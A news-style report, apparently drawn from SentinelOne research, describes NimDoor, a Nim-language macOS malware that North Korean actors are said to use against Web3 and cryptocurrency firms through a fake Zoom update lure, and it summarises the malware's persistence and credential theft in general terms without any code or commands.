In a surprising shift, North Korean threat actors have been found targeting Web3 and cryptocurrency businesses using malware developed in the Nim programming language. This revelation highlights the evolving tactics of these cybercriminals as they adapt to exploit vulnerabilities in emerging technology sectors. Reports from cybersecurity firm SentinelOne indicate that these attackers have implemented sophisticated techniques to infiltrate systems and harvest sensitive data.
According to researchers Phil Stokes and Raffaele Sabato, the malware, dubbed NimDoor, utilizes a process injection technique uncommon in macOS environments. The attackers leverage remote communications through WebSocket, an encrypted protocol, signaling a new wave of sophisticated cyber attacks. The malware’s resilience is underscored by its persistence mechanism, which employs advanced signal handlers to remain active even after system reboots.
Part of the attack strategy involves social engineering, wherein targeted individuals receive communications via messaging platforms like Telegram. They are lured to a Zoom meeting scheduled through Calendly, coupled with instructions to run a purported Zoom SDK update script. This deceptive tactic leads to the execution of an AppleScript designed to pull down malicious payloads while misleading users into believing they are redirected to a legitimate service.
Once the malware infects a device, it establishes a backdoor communication with remotely controlled servers, enabling attackers to send commands and gather system information. The malware is equipped with capabilities to extract sensitive credentials from popular web browsers and applications such as Telegram. The targeted use of AppleScript allows for continued data gathering even after attempts to terminate the malware are made. The implications of this sophisticated attack strategy are significant, as it reflects a worrying trend in the tactics employed by North Korean hackers to compromise global cybersecurity.